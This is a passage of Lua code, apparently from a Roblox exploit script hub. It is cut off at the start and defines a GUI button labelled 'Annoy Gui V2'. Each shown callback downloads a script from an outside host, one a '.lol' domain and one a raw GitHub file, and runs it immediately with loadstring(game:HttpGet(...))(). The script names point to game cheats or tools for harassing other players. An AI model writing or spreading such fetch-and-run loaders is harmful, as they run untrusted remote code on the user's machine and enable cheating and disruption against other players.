loadstring(game:HttpGet("https://shattered-gang.lol/scripts/fe/fe_scp_173.lua"))()
end,
})
local Button = Tab:CreateButton({
 Name = "Annoy Gui V2",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Annoy%20Gui%20V2", true))()
end,
})


end


